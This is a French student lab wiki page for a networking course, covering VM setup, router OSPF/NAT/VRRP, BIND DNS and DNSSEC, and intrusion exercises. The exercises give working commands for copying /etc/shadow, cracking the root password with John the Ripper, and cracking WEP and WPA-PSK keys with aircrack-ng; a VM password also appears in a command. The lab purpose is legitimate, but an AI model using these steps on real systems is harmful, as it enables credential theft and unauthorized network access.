&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53846</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53846"/>
				<updated>2020-11-16T22:48:26Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.4  Sécurisation de serveur DNS par DNSSEC (pas encore fait) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (16/11/2020)==&lt;br /&gt;
(En collaboration avec le groupe 14)&lt;br /&gt;
&lt;br /&gt;
On connecte physiquement l'ISR au SDSL: Dans le local technique SR52, on repere sur quel port est branché le l'ÍSR pour le mettre dans le VLAN 531&lt;br /&gt;
 conf t&lt;br /&gt;
 int Gi0/37&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 531&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Sur l'ISR:&lt;br /&gt;
* On creer le vlan 531:&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 531&lt;br /&gt;
&lt;br /&gt;
==3.9  Interconnexion Internet de secours (IPv6) (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
=4  Services Internet=&lt;br /&gt;
&lt;br /&gt;
==Connexion a internet (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
   auto lo&lt;br /&gt;
   iface lo inet loopback&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
   auto eth0&lt;br /&gt;
   iface eth0 inet static&lt;br /&gt;
   address 193.48.57.188&lt;br /&gt;
   netmask 255.255.255.255&lt;br /&gt;
   up ip address add dev eth0 100.64.0.28/24&lt;br /&gt;
   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
Le service SSH était activé par defaut.&lt;br /&gt;
Il faut juste autoriser la connexion en root dans le fichier /etc/ssh/sshd_config&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
puis systemctl restart sshd&lt;br /&gt;
&lt;br /&gt;
et on peut se connecter a notre vm&lt;br /&gt;
 ssh root@193.48.57.188&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La configuration a été réalisé en suivant les instructions dans le sujet de TP rubrique : 4.4  Sécurisation de serveur DNS par DNSSEC&lt;br /&gt;
&lt;br /&gt;
Premièrement nous avons modifié le ficher named.conf.options pour y ajouter l'options suivantes:&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite crée un repertoir trompettedelamort.dnssec afin d'y générer les clefs. Nous devons générer une paire de clef KSK et une paire de clef ZSK.&lt;br /&gt;
&lt;br /&gt;
Pour créer la paire de clef KSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Et pour la paire de clef ZSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Nous renommons ces paires avec comme prefixe trompettedelamort.site et comme suffice -zsk pour la paire zsk et -ksk pour la paire ksk et nous terminon avec .key pour les clefs publiques et .private pour les clefs privées.&lt;br /&gt;
&lt;br /&gt;
Ensuite dans notre fichier zone db.trompettedelamort.site nous ajoutons les lignes suivantes sans oublier d'incrémenter le  Serial:&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-zsk.key&lt;br /&gt;
&lt;br /&gt;
Le fichier db.trompettedelamort.site ressemble donc à cela:&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @ 	IN	SOA	 ns1.trompettedelamort.site.  postmaster.trompettedelamort.site.(&lt;br /&gt;
&lt;br /&gt;
			      8		; Serial&lt;br /&gt;
			 604800		; Refresh&lt;br /&gt;
			  86400		; Retry&lt;br /&gt;
			2419200		; Expire&lt;br /&gt;
			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.trompettedelamort.site.&lt;br /&gt;
 @	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @	IN	MX	100 ns1.trompettedelamort.site.&lt;br /&gt;
 ns1	IN	A       193.48.57.188&lt;br /&gt;
 www	IN	A	193.48.57.188	&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les enregristrement de la zone avec la commande suivante:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
Ce qui a pour effet de générer un fichier zone &amp;quot;db.trompettedelamort.site.signed&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous n'avons donc plus qu'a remplacer db.trompettedelamort.site par db.trompettedelamort.site.signed dans le fichier named.conf.local:&lt;br /&gt;
 root@trompettedelamort:~# cat /etc/bind/named.conf.local   &lt;br /&gt;
 //&lt;br /&gt;
 // Do any local configuration here&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site.signed&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
	     allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
 // Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
 // organization&lt;br /&gt;
 //include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne reste plus qu'a fournir la clef publique de la clef KSK à gandi.net. Pour se faire il faut se rendre dans &amp;quot;DNSSEC&amp;quot; puis dans &amp;quot;Add an external key&amp;quot;, choisir KSK et &amp;quot;RSA/SHA-1&amp;quot; et renseigner la clef se trouvant dans&lt;br /&gt;
 /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key &lt;br /&gt;
&lt;br /&gt;
On vérifie&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
